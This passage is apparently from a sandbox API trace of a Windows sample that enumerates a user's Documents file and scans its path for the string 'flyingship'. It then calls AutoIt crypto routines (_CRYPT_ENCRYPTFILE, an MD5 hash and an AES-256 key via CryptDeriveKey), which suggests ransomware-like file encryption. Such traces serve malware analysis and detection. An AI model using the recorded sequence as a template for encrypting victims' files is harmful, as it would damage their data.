ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xe06b1270, ftLastWriteTime.dwHighDateTime=0x1d5e32b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 0x90add8 [0171.281] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.281] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xe06b1270, ftLastWriteTime.dwHighDateTime=0x1d5e32b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 0x90add8 [0171.282] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.282] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kQVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VkybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ybnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bnJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nJLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JLUTO.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.284] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.284] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0171.284] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.284] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.285] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xe06b1270, ftLastWriteTime.dwHighDateTime=0x1d5e32b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 0x90ae18 [0171.285] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0171.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.285] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.285] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.285] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.286] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0171.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0171.286] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.286] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.286] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.286] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0171.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.287] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0171.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.288] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0171.288] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.288] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.288] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0171.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.289] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.289] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.289] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.289] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.289] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.289] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.289] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.297] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.297] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.297] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.297] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.298] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.298] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.299] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0171.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.299] CryptDestroyHash (hHash=0x90af58) returned 1 [0171.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.299] PeekMessageW (in: lpMsg=0x87f36c, 